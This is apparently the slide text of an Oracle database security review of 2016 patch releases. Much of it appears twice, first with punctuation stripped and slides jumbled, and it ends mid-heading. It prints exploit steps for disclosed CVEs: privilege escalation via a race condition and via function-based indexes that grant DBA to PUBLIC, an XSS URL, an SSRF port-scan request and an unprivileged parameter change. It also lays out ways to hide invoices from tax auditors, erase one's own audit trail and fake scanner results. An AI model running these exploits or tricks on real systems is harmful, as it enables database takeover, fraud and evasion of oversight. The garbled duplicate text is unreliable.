The Oracle Workspace Manager allows a user to version enable database tables This is achieved by creating workspaces which contain the versioned data The Workspace Manager contains a number of PLSQL packages that are used to manage workspaces To function correctly some management actions must be performed with higher privileges than a normal user might have and so to enable this some of the management functions execute with the privileges of the WMSYS user The main workspace manager interface is the LT PLSQL package and this executes with the privileges of the user that calls or invokes LT When privileged work is required to be executed LT calls the LTADM package The LTADM package executes with the privileges of the owner or definer in this case WMSYS WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER that allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema
Jan 2016 CPU- CVE-2015-4925
SELECT COUNT() INTO CNTFROM V$OPEN_CURSOR OC V$SQL S V$OBJECT_DEPENDENCY OD WHERE OCSID = USER_SID AND [hellip] AND ODTO_TYPE IN (78911)
Here ODTO_TYPEs 789 and 11 are functions procedures packages and objects If any such dependency exists then the user supplied query will not be executed and an error is raised IF (CNTgt0) THEN WMSYSWM_ERRORRAISEERROR(WMSYSLTWM_ERROR_81_NO) END IF
SQL_STR2 =declaredelstatuses wmsysltUtilnumber_tab beginselect WM_delstatus bulk collect into delstatusesfrom || WMSYSLTUTILGETVN(TABLE_OWNER TAB_NAME _BASE) || where WM_version = || CURVER || and || NEWWHERE_CLAUSE || for updateend WMSYSLTADMEXECSQL(SQL_STR2)
Jan 2016 CPU- CVE-2015-4925SQLgt CONNECT RACERPASSWORD SQLgt CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X)) SQLgt INSERT INTO FOO (X) VALUES (1) SQLgt COMMITSQLgt EXEC WMSYSLTENABLEVERSIONING(sbquoFOO)
SQLgt create or replace function Y return number authid current_user is 2 pragma autonomous_transaction3 begin4 dbms_outputput_line(BANG)5 execute immediate create or replace procedure owned(p varchar) is begin execute immediate p end6 execute immediate grant execute on owned to public7 dbms_outputput_line(sys_context(userenvcurrent_user)) 8 return 19 end 10
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
January 2016 CPU
7 security fixes (No remote exploitable)
1 Java VM (CVSS 90)
1 Workspace Manager (CVSS 65)
2 XML Database (CVSS 55 40)
1 Database Vault (CVSS 40)
1 Security (CVSS 40)
1 XML Developerrsquos Kit (CVSS 40)
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html
Jan 2016 CPU- CVE-2016-0467
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Oracle native auditing fails to capture
bdquoCreate Java Sourceldquo
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
Jan 2016 CPU- CVE-2015-4921
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Status is incorrectly reported if SYS
Auditing is used together with DB Vault
Reporter David Litchfield
Jan 2016 CPU- CVE-2015-4925
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Privilege escalation via Race Condition
in WMSYSLTCOPYFORUPDATE
Reporter David Litchfield
The Oracle Workspace Manager allows a user to version enable database tables This is achieved by creating workspaces which contain the versioned data The Workspace Manager contains a number of PLSQL packages that are used to manage workspaces To function correctly some management actions must be performed with higher privileges than a normal user might have and so to enable this some of the management functions execute with the privileges of the WMSYS user The main workspace manager interface is the LT PLSQL package and this executes with the privileges of the user that calls or invokes LT When privileged work is required to be executed LT calls the LTADM package The LTADM package executes with the privileges of the owner or definer in this case WMSYS WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER that allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema
Jan 2016 CPU - CVE-2015-4925
SELECT COUNT(*) INTO CNT FROM V$OPEN_CURSOR OC, V$SQL S, V$OBJECT_DEPENDENCY OD
 WHERE OC.SID = USER_SID AND [...] AND OD.TO_TYPE IN (7, 8, 9, 11);

Here OD.TO_TYPEs 7, 8, 9 and 11 are functions, procedures, packages and objects. If any such dependency exists, then the user-supplied query will not be executed and an error is raised:
IF (CNT > 0) THEN WMSYS.WM_ERROR.RAISEERROR(WMSYS.LT.WM_ERROR_81_NO); END IF;

SQL_STR2 := 'declare delstatuses wmsys.ltUtil.number_tab; begin select WM_delstatus bulk collect into delstatuses from '
  || WMSYS.LTUTIL.GETVN(TABLE_OWNER, TAB_NAME, '_BASE')
  || ' where WM_version = ' || CURVER || ' and ' || NEWWHERE_CLAUSE || ' for update; end;';
WMSYS.LTADM.EXECSQL(SQL_STR2);
Jan 2016 CPU - CVE-2015-4925
SQL> CONNECT RACER/PASSWORD
SQL> CREATE TABLE FOO(X NUMBER, CONSTRAINT X_PK PRIMARY KEY(X));
SQL> INSERT INTO FOO (X) VALUES (1);
SQL> COMMIT;
SQL> EXEC WMSYS.LT.ENABLEVERSIONING('FOO');

SQL> create or replace function Y return number authid current_user is
  pragma autonomous_transaction;
  begin
    dbms_output.put_line('BANG');
    execute immediate 'create or replace procedure owned(p varchar) is begin execute immediate p; end;';
    execute immediate 'grant execute on owned to public';
    dbms_output.put_line(sys_context('userenv', 'current_user'));
    return 1;
  end;
  /

Jan 2016 CPU - CVE-2015-4925
SQL> GRANT EXECUTE ON Y TO PUBLIC;
SQL> CREATE TABLE RACER(Y NUMBER);
SQL> INSERT INTO RACER(Y) VALUES (1);
SQL> COMMIT;

SQL> create or replace procedure attempt_it is
  begin
    execute immediate 'BEGIN WMSYS.LT.COPYFORUPDATE(''FOO'', ''X=LENGTH((SELECT 1 FROM RACER.RACER WHERE RACER.Y=1))''); END;';
  exception when others then
    null;
  end;
  /
SQL> declare
    i number := 0;
  begin
    for i in 1..1000 loop
      execute immediate 'alter table RACER.RACER rename column Y to Z';
      execute immediate 'alter table RACER.RACER rename column Z to Y';
    end loop;
  end;
  /
Jan 2016 CPU - CVE-2015-4925
SQL> DESC WMSYS.OWNED
PROCEDURE WMSYS.OWNED
 Argument Name    Type        In/Out  Default?
 ---------------  ----------  ------  --------
 P                VARCHAR2    IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html
April 2016 CPU
5 security fixes (2 remotely exploitable)
1 Java VM (CVSS 9.0)
1 OLAP (CVSS 7.8)
3 RDBMS Security (CVSS 5.9, 3.3, 3.3; 1 remote)
http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html
Apr 2016 CPU - CVE-2016-0690
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: AUDIT NOT EXISTS fails to capture attempts to execute a procedure that does not exist, either because the user does not have the execute privilege on it or because the procedure does not exist. If a DBA wants to capture attempts to execute procedures where the user does not have the execute privilege, we must also add:
Reporter: David Litchfield
Exploit:
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU - CVE-2016-0691
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: If a missing (due to no execute privilege) function is within a SELECT query, the name of the function is not logged, but the name of the table in the query is.
Reporter: David Litchfield
Exploit: obvious, Create Java Source…
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
July 2016 CPU
9 security fixes (5 remotely exploitable)
1 OJVM (CVSS 9.0)
1 JDBC (CVSS 8.1, remote)
1 Portable Clusterware (CVSS 7.5, remote)
1 Data Pump (CVSS 6.7)
2 APEX (CVSS 6.1, 5.8; 2 remote)
1 RDBMS Security (CVSS 5.3, remote)
1 DB Sharding (CVSS 4.4)
1 Database Vault (CVSS 3.4)
http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
Jul 2016 CPU - CVE-2016-3448
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: The HTMLDB_UTIL PL/SQL package is vulnerable to an XSS flaw. To access it, the schema (APEX_050000) needs to be specified first, however, because the config file whitelists apex.
Reporter: David Litchfield
Exploit:
http://example.com/ords/apex_050000.htmldb_util.JSON_FROM_ARRAY?P_COLS=1&P_NAME01=XX%22%3E%3CH1%3EOops%3C/H1%3E&P_F01=Y&P_ROWS=1
Jul 2016 CPU - CVE-2016-3467
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: APEX 5 is vulnerable to a server-side request forgery flaw, i.e. it can be made to connect to another web server and port regardless of whether allowed URLs have been configured. For example, the request below will connect to someotherserver on port and POST "X" as a payload. This can be used as a port scanning mechanism, used to attack systems protected by a firewall etc.
Reporter: David Litchfield
Exploit:
http://example/ords/apex_050000.WWV_FLOW_WEBSERVICES_API.MAKE_REQUEST?P_URL=http://someotherserver:port&p_envelope=X
Apr 2016 CPU - CVE-2016-3488
Problem: The package dbms_gsm_common allows changing database parameters without the admin privileges and without a restart
Reporter: Bruno Cirone
Exploit:
exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY', 'TRUE')

Jul 2016 CPU - CVE-2016-3488
-- as SYS
SQL> select name, value from v$parameter where name = 'O7_DICTIONARY_ACCESSIBILITY';
O7_DICTIONARY_ACCESSIBILITY  FALSE
-- as user GSMUSER
SQL> exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY', 'TRUE')
PL/SQL-Prozedur erfolgreich abgeschlossen.
-- as user SYS - re-run again after execution of the package
SQL> select name, value from v$parameter where name = 'O7_DICTIONARY_ACCESSIBILITY';
O7_DICTIONARY_ACCESSIBILITY  TRUE
July 2016 CPU - CVE-2016-3484
Problem: SYS can influence the DVSYS analysis
Reporter: Alexander Kornbrust
Problem (details + exploit later…):
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN RETURN 'N'; END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN RETURN 'N'; END IF;
  RETURN 'Y';
END;
July 2016 CPU - CVE-2016-3489
Problem: Privilege escalation via INDEX privilege and function-based index (FBI)
Reporter: Alexander Kornbrust

July 2016 CPU - CVE-2016-3489
-- Oracle 11.2.0.4
SYSTEM SQL> select grantee, owner, table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = 'INDEX' AND GRANTEE != OWNER and owner = 'SYS';
GRANTEE   OWNER   TABLE_NAME
--------  ------  ----------
SYSTEM    SYS     INCEXP
SYSTEM    SYS     INCFIL
SYSTEM    SYS     INCVID

SYSTEM SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
  BEGIN
    execute immediate 'grant select on sys.link$ to public';
    COMMIT;
    RETURN FOO;
  END;
  /
SQL> grant execute on getdba to public;

July 2016 CPU - CVE-2016-3489
==> SYSTEM does not have access to the SYS.LINK$ table
SQL> select count(*) from sys.link$;
ERROR at line 1:
ORA-01031: insufficient privileges

==> also the execution of getdba throws an error
SQL> select getdba('i') from dual;
ERROR at line 1:
ORA-01031: insufficient privileges
ORA-06512: at "SYSTEM.GETDBA", line 4

==> Now create an index on the table sys.incvid using a function-based index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('AK'));
Index created.
SQL> select count(*) from sys.link$;
COUNT(*)
----------
11

July 2016 CPU - CVE-2016-3489
-- Oracle 12.1.0.2 (SYSTEM no longer has INHERIT ANY PRIVILEGES)
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCvid(SYSTEM.GETDBA(1));
CREATE INDEX EXPLOIT_INDEX ON SYS.INCvid(SYSTEM.GETDBA(1))
FEHLER in Zeile 1:
ORA-06598: Nicht ausreichende INHERIT PRIVILEGES-Berechtigung
ORA-06512: in "SYSTEM.GETDBA", Zeile 1

-- On 12.1.0.2 the user WMSYS has CREATE ANY INDEX, and the SYSTEM user can use
-- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsys.GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
  BEGIN
    execute immediate 'grant select on sys.link$ to public';
    COMMIT;
    RETURN FOO;
  END;
  /
SQL> grant execute on wmsys.getdba to public;
-- now we create the index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(WMSYS.GETDBA('AK'));
August 2016
Hackproofing Oracle's eBusiness Suite by David Litchfield
Presentation + supporting documents:
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5.pdf
September 2016
Nothing special happened
October 2016
Oracle CPU October 2016
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
October 2016 CPU
9 security fixes (1 remotely exploitable)
1 OJVM (CVSS 9.1)
2 Kernel PDB (CVSS 6.4, 6.0)
3 RDBMS Security (CVSS 6.4, 3.3, 3.3)
1 APEX (CVSS 6.1, remote)
1 RDBMS Security & SQL*Plus (CVSS 2.4)
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
Oct 2016 CPU - CVE-2016-5497
Problem: Unsalted MD5 hash still present in the 12c database (digest verifier)
Shown as an open problem in the DOAG 2015 presentation
Reporter: Alexander Kornbrust
Oracle Password Hash 12.1.0.2+
Oracle 12.1.0.2 introduced a new PBKDF2-SHA512 based algorithm.
The new "T" password hash is 10 times slower than the old DES hash (Oracle 7+) and 88 times slower than the SHA1-based hash (Oracle 11+).
The new algorithm is known and already implemented in some tools.
Remark: Microsoft Office 2013 is 10 times more time-consuming to crack than the new Oracle PBKDF2.
Oracle Password Hash 12.1.0.2+
Let's have a look at RFC 2617:
KD(secret, data) = H(concat(secret, ":", data))
No salt, but a secret:
Secret = 'XDB'
and the hash will be MD5(XDB:tiger),
stored in the spare4 column, starting with "H:" (the H hash).
Oct 2016 CPU - CVE-2016-5516
